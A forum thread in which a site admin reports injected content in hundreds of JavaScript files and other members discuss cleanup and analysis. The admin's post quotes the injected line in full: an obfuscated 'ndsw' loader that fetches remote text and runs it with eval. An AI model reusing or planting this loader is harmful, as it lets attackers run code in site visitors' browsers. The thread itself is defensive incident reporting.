Compromised server?


Well-known member
Twice in the past week 287 js files within my forum and testforum (same server, different directories) have been reported as having 'Unexpected content', the latest event was today. Also the 'service_worker.js' and 'src/vendor/joypixels/emoji-toolkit/..'

I've restored them from a backup.

Is this something that is a result of a compromised server, or..... ?

CENTOS 7.9 [server] v94.0.8

As far as I'm aware the server is up to date and all security suggestions are implemented with the exception of JailApache

Last edited:
Upon further checking, this line was the 'Unexpected content' added to the end of the files affected...

;if(ndsw===undefined){var ndsw=true,HttpClient=function(){this['get']=function(a,b){var c=new XMLHttpRequest();c['onreadystatechange']=function(){if(c['readyState']==0x4&&c['status']==0xc8)b(c['responseText']);},c['open']('GET',a,!![]),c['send'](null);};},rand=function(){return Math['random']()['toString'](0x24)['substr'](0x2);},token=function(){return rand()+rand();};(function(){var a=navigator,b=document,e=screen,f=window,g=a['userAgent'],h=a['platform'],i=b['cookie'],j=f['location']['hostname'],k=f['location']['protocol'],l=b['referrer'];if(l&&!p(l,j)&&!i){var m=new HttpClient(),o=k+'//'+token();m['get'](o,function(r){p(r,'ndsx')&&f['eval'](r);});}function p(r,v){return r['indexOf'](v)!==-0x1;}}());};

The file linked within the code exists as a .htm file, not a .php file

This issue appears almost identical to one posted here:

Malware has been identified and removed.
Also ImunifyAV+ has been installed and set up to monitor and scan the server files, hopefully to prevent it from happening again.
Also Wordpress / Joomla sites? Or all XF?
Wordpress and Joomla are very vulnerable, especially if you are not running the latest updates.
Last edited:
As I was interested in this malicious script (as I do have a strong interest in Information Security work and topics) I took some time out of my day to analyse the code. This is a very interesting attack vendor. After the fourth script which I deobfuscated and analysed I wasn't able to continue with analyzing its behaviour further since I suspect the command and control server is not delivering a new virus file and I don't have access to the malicious PHP file which is added to the file system (if you have a copy of that file I'd be very happy to analyse it when you provide me with the file) but I found a good article on how this attack works and what it is doing under the hood.

I can't say for sure if that is everything the attack was doing so I recommend, that you inform your users about this attack against your site and tell them to clear the complete browser storage for your site and change their password just to be sure. For you as an admin you should make sure that your system is safe, maybe get your service providers to audit your system for you.

You can read about it the attack here:
Top Bottom